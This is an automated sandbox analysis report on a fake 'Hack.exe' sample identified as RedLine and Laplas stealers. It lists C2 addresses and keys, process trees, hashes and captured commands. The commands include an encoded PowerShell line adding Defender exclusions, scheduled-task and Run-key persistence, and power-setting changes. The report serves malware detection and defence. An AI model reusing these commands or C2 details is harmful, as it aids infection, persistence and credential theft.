Analysis
-
max time kernel
41s -
max time network
138s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
30-07-2023 21:52
Static task
static1
Behavioral task
behavioral1
Sample
Setup Hack/Hack.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Setup Hack/Hack.exe
Resource
win10-20230703-en
Behavioral task
behavioral3
Sample
Setup Hack/Hack.exe
Resource
win10v2004-20230703-en
General
-
Target
Setup Hack/Hack.exe
-
Size
2.4MB
-
MD5
a72a98d3af3f7afeb0859746621cbb96
-
SHA1
46bd27a8881f46432aed56096532099f531fda07
-
SHA256
25f2b8249f473ecbbdce0c8251584193a264d65a2e66cf2d436d6cc998131de7
-
SHA512
4111f8820d8d001c6e04433aaa790dde32b49899b2a55f0b26eefbde87e19ecd49f18d86b464d800c7e9780236b1dfc5a3ee6a828ee468bdb6f0433c7f2e8db8
-
SSDEEP
24576:752A3xTrSOlk1yk1g6YmBeJ5D5BtndadNK:/xTrSO+K6pBe4K
Malware Config
Extracted
redline
@Turbin63
94.142.138.4:80
-
auth_value
c9d51c45ece76628902c971fd5a55a1c
Extracted
laplas
http://185.209.161.189
-
api_key
f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 4716 svchost.exe 1100 conhost.exe 764 7z.exe 2932 7z.exe 236 7z.exe 992 4.exe 5000 ntlhost.exe -
Loads dropped DLL 3 IoCs
pid Process 764 7z.exe 2932 7z.exe 236 7z.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1148472871-1113856141-1322182616-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1164 set thread context of 4556 1164 Hack.exe 71 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2344 1164 WerFault.exe 69 -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 25 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4556 AppLaunch.exe 4556 AppLaunch.exe 992 4.exe 3280 powershell.exe 3280 powershell.exe 3280 powershell.exe 992 4.exe 992 4.exe 992 4.exe 992 4.exe 992 4.exe 992 4.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 4556 AppLaunch.exe Token: SeRestorePrivilege 764 7z.exe Token: 35 764 7z.exe Token: SeSecurityPrivilege 764 7z.exe Token: SeSecurityPrivilege 764 7z.exe Token: SeRestorePrivilege 2932 7z.exe Token: 35 2932 7z.exe Token: SeSecurityPrivilege 2932 7z.exe Token: SeSecurityPrivilege 2932 7z.exe Token: SeRestorePrivilege 236 7z.exe Token: 35 236 7z.exe Token: SeSecurityPrivilege 236 7z.exe Token: SeSecurityPrivilege 236 7z.exe Token: SeDebugPrivilege 992 4.exe Token: SeDebugPrivilege 3280 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1164 wrote to memory of 4556 1164 Hack.exe 71 PID 1164 wrote to memory of 4556 1164 Hack.exe 71 PID 1164 wrote to memory of 4556 1164 Hack.exe 71 PID 1164 wrote to memory of 4556 1164 Hack.exe 71 PID 1164 wrote to memory of 4556 1164 Hack.exe 71 PID 4556 wrote to memory of 4716 4556 AppLaunch.exe 75 PID 4556 wrote to memory of 4716 4556 AppLaunch.exe 75 PID 4556 wrote to memory of 1100 4556 AppLaunch.exe 76 PID 4556 wrote to memory of 1100 4556 AppLaunch.exe 76 PID 4556 wrote to memory of 1100 4556 AppLaunch.exe 76 PID 1100 wrote to memory of 4144 1100 conhost.exe 77 PID 1100 wrote to memory of 4144 1100 conhost.exe 77 PID 4144 wrote to memory of 920 4144 cmd.exe 79 PID 4144 wrote to memory of 920 4144 cmd.exe 79 PID 4144 wrote to memory of 764 4144 cmd.exe 80 PID 4144 wrote to memory of 764 4144 cmd.exe 80 PID 4144 wrote to memory of 2932 4144 cmd.exe 81 PID 4144 wrote to memory of 2932 4144 cmd.exe 81 PID 4144 wrote to memory of 236 4144 cmd.exe 82 PID 4144 wrote to memory of 236 4144 cmd.exe 82 PID 4144 wrote to memory of 4900 4144 cmd.exe 84 PID 4144 wrote to memory of 4900 4144 cmd.exe 84 PID 4144 wrote to memory of 992 4144 cmd.exe 83 PID 4144 wrote to memory of 992 4144 cmd.exe 83 PID 4144 wrote to memory of 992 4144 cmd.exe 83 PID 992 wrote to memory of 2936 992 4.exe 85 PID 992 wrote to memory of 2936 992 4.exe 85 PID 992 wrote to memory of 2936 992 4.exe 85 PID 2936 wrote to memory of 3280 2936 cmd.exe 87 PID 2936 wrote to memory of 3280 2936 cmd.exe 87 PID 2936 wrote to memory of 3280 2936 cmd.exe 87 PID 992 wrote to memory of 600 992 4.exe 90 PID 992 wrote to memory of 600 992 4.exe 90 PID 992 wrote to memory of 600 992 4.exe 90 PID 992 wrote to memory of 3868 992 4.exe 89 PID 992 wrote to memory of 3868 992 4.exe 89 PID 992 wrote to memory of 3868 992 4.exe 89 PID 4716 wrote to memory of 5000 4716 svchost.exe 88 PID 4716 wrote to memory of 5000 4716 svchost.exe 88 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4900 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup Hack\Hack.exe"C:\Users\Admin\AppData\Local\Temp\Setup Hack\Hack.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe4⤵
- Executes dropped EXE
PID:5000
-
-
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\system32\mode.commode 65,105⤵PID:920
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p151971033210090161381766327410 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Users\Admin\AppData\Local\Temp\main\4.exe"4.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjADYAVAA1AHYAZABmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgB1AHUAQgA5AGkAbgBOADkAaABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8ARwBZAE8ASwBxAHMASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlADIANwBmAGEAMgBMADUATgBsAHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off6⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjADYAVAA1AHYAZABmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgB1AHUAQgA5AGkAbgBOADkAaABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8ARwBZAE8ASwBxAHMASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlADIANwBmAGEAMgBMADUATgBsAHgAIwA+AA=="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1344" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:3868
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:600
-
-
-
C:\Windows\system32\attrib.exeattrib +H "4.exe"5⤵
- Views/modifies file attributes
PID:4900
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 3242⤵
- Program crash
PID:2344
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.5MB
MD56736c0e1179296ff6dfa0191ac874c7a
SHA189566e42fb866eecf5e8282b967461299ab7a08c
SHA256c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA51285791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c
-
Filesize
2.5MB
MD56736c0e1179296ff6dfa0191ac874c7a
SHA189566e42fb866eecf5e8282b967461299ab7a08c
SHA256c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA51285791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c
-
Filesize
21KB
MD5a761e93d5993567d382af163745760ad
SHA127bd150490cd443a60bb70fa8b83299d75e02779
SHA2561edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
21KB
MD5a761e93d5993567d382af163745760ad
SHA127bd150490cd443a60bb70fa8b83299d75e02779
SHA2561edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa
-
Filesize
2.1MB
MD54762f0b6652250641a06e2029d6dda23
SHA1bfa7925486f951f729b3ce47caa6ff52330420ad
SHA2561e9654f0b077cfb8c393cb6cfd3d2b7918d87d56eaaf14f8523a582343d13b4e
SHA51233227e64cc34f7e591f6a26b6eaef2f2b4369050e5a2c544413b8f8264114083a93fa70911810c19390ed3d1724bd73c135a2acf11f12f70892f20609593c72d
-
Filesize
9KB
MD5018ccdb718d3ad7641fecfdad0fbeb4e
SHA146cdffdea8e44b455873659a35dcd973364a84dd
SHA256708b3379e029aafb112f890a6ae10f2a4eebe52eef991d2d6136a11fe84143b5
SHA512dcd1494429ced81dfbcc83cb8c87d4cd42719d53918834e16691c0d068631ae39fe0381c668e92341a5cdccf75877c2af3ae81c66b6d37e4b149f68a06ab2803
-
Filesize
1.5MB
MD5270d4612657b69eda3ebbb1207fc8cd7
SHA1e023ff99c13c056fa7f80b55dc12f1d02df92114
SHA25683b0eb7eee4c982f034d53b7541758fac699956433baeedf9b8f4494e367b5e7
SHA5126fe46a7dd1fc6930646e3ba08306e1cfe826dcba6b7e3af1c9439157f35919739940e1d8143c6abecfa83f6b92d324764dfa8ca54dca91250b849c2cd138e6fe
-
Filesize
1.5MB
MD57cebec977eb671d25c4160ee75cbf124
SHA1e09e0e906834b7f2ec270ba589a01e455ebdf0d1
SHA256f0e78c63d52116f121709480935013c26a99bd85ba6bfd5100bc5e4411c7178e
SHA512b79c8d6d4c947fdee755ef81c5c36d657ca1b4030c8f90f906961a22968c98d8fb6e33302191c28135c2593598876b6921f766270a50063754927b4404c798d1
-
Filesize
436B
MD57f4c4965a2f78d6de87d304fdd355abf
SHA187a05c16753a036126677fe53118c07d36c0e671
SHA256ed489607187114988306637dae2b81eff225315a8a8ee221249d14430f264fdb
SHA51241c949862477065b8f537670b6747074c9e543753812fcb28b02be12b1bbf0fb8b9473ea0859fb1450fee848d62d4c70249d09f48a5e5eac15eb510b70b3f741
-
Filesize
4.0MB
MD5d076c4b5f5c42b44d583c534f78adbe7
SHA1c35478e67d490145520be73277cd72cd4e837090
SHA2562c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638
-
Filesize
4.0MB
MD5d076c4b5f5c42b44d583c534f78adbe7
SHA1c35478e67d490145520be73277cd72cd4e837090
SHA2562c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638
-
Filesize
619.4MB
MD5fa0485c191de434cbcf0951eb8102cfd
SHA130de2e720f010138b067664ce05ab442ae4fc6b5
SHA2565f4b39159be8b7875b30bc749bb71a6de8ee86fd39f31032046f1aa1c409c104
SHA512102bdd50bdcacd28c202f0665ad868ea4cdfe72e80374531bff54e675ad83941d1f3c488080c1b6965271cafc96f5eaeae68529970d92ac5d229b00ba3b4c55c
-
Filesize
644.9MB
MD5faaee6b3cecc3238edd23dfd4685c780
SHA19c01743c79d1e0fa96e10a8068392942d640a6a0
SHA2567dcf59fe82411088feff1b379e79fabf7422a5d29cb064c6cad8ce15e85995b0
SHA51225f37f6076d19f29f45626c0d4c48f151dc44fbbd0f1fe37e5ff4a77d4074f7cd06804d05ecd6efe74ba84f498c5357c9f5da691f1b34458428a73f291f7c784
-
Filesize
580.0MB
MD5bbe777dfc2908078fd4affa4419cf86e
SHA19ff970f60bd0da16208039322497fce824c0e9e9
SHA2563bccae57548946d25fd3d8f63e27a4e563ebc382fc7a790c518afe293e4ac926
SHA512fc08b3ecb82e4cae4d1871aa623a7d8ecd347aefe5866957720d0bf32c5c13a810f0615bf458f879837c8af2adfcdae4437bbc52a2ac68db8b45507470bc2c52
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511